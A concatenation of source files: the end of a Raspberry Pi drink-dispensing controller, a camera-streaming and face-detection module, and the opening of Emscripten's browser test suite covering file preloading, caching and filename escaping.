spi_device = 0
gpio = gaugette.gpio.GPIO()
spi = gaugette.spi.SPI(spi_bus, spi_device)
# Very important... This lets py-gaugette 'know' what pins to use in order to reset the display
self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width) # Change rows & cols values depending on your display dimensions.
self.led.begin()
self.led.clear_display()
self.led.display()
self.led.invert_display()
time.sleep(0.5)
self.led.normal_display()
time.sleep(0.5)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
self.strip.begin() # Initialize pins for output
self.strip.setBrightness(NEOPIXEL_BRIGHTNESS) # Limit brightness to ~1/4 duty cycle
# turn everything off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
print "Done initializing"
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def stopInterrupts(self):
GPIO.remove_event_detect(self.btn1Pin)
GPIO.remove_event_detect(self.btn2Pin)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def displayMenuItem(self, menuItem):
print menuItem.name
self.led.clear_display()
self.led.draw_text2(0,20,menuItem.name,2)
self.led.display()
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
for x in range(1, 101):
self.led.clear_display()
self.updateProgressBar(x, y=35)
self.led.display()
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
lightsThread = threading.Thread(target=self.cycleLights)
lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
lightsThread.do_run = False
lightsThread.join()
# show the ending sequence lights
self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
if not self.running:
self.menuContext.advance()
def right_btn(self, ctx):
if not self.running:
self.menuContext.select()
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.led.draw_pixel(w + x, y)
self.led.draw_pixel(w + x, y + height)
for h in range(0, height):
self.led.draw_pixel(x, h + y)
self.led.draw_pixel(self.screen_width-x, h + y)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.led.draw_pixel(x + p_loc, h + y)
def run(self):
self.startInterrupts()
# main loop
try:
while True:
time.sleep(0.1)
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
Vision.py
|
from threading import Thread, Event
import cv2
#import time
import datetime
import uuid
import os
#This class is used to approximate the processing frames per second
#This class has no functional purpose per se, strictly for information
class FPS:
def __init__(self):
self._start = None
self._end = None
self._numFrames = 0
def start(self):
self._start = datetime.datetime.now()
return self
def stop(self):
self._end = datetime.datetime.now()
def update(self):
self._numFrames += 1
def elapsed(self):
return(self._end - self._start).total_seconds()
def fps(self):
return self._numFrames / self.elapsed()
#This class threads the camera read
class WebcamVideoStream:
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
self.t = Thread(target=self.update, args=())
self.t._stop_event = Event()
def start(self):
self.t.daemon = True
self.t.start()
return self
def update(self):
while(True):
if(self.stopped):
break
else:
(self.grabbed, self.frame) = self.stream.read()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
self.t._stop_event.set()
self.t.join(3)
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=32):
from picamera.array import PiRGBArray
from picamera import PiCamera
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
#self.update()
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if(self.stopped):
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
class VideoStream:
def __init__(self, src=0, usePiCamera=True, resolution=(320, 240), framerate=32):
if usePiCamera:
self.stream = PiVideoStream(resolution=resolution, framerate=framerate)
else:
self.stream = WebcamVideoStream(src=src)
def start(self):
return self.stream.start()
def update(self):
self.stream.update()
def read(self):
return self.stream.read()
def stop(self):
self.stream.stop()
class TempImage:
def __init__(self, basePath="./", ext=".jpg"):
# construct the file path
self.path = "{base_path}/{rand}{ext}".format(base_path=basePath,
rand=str(uuid.uuid4()), ext=ext)
def cleanup(self):
# remove the file
os.remove(self.path)
class FaceDetector:
def __init__(self, faceCascadePath):
self.faceCascade = cv2.CascadeClassifier(faceCascadePath)
def detect(self, image, scaleFactor =1.1, minNeighbors=5, minSize=(30,30)):
rects = self.faceCascade.detectMultiScale(image, scaleFactor=scaleFactor, minNeighbors=minNeighbors, minSize=minSize, flags=cv2.CASCADE_SCALE_IMAGE)
return rects
def test(self):
print("yes")
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER
from runner import no_wasm_backend, create_test_file, parameterized, ensure_dir
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, V8_ENGINE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest(['src.cpp', '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4', '-o', 'page.html'])
self.run_browser('page.html', None, '/report_result?1')
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
'''))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
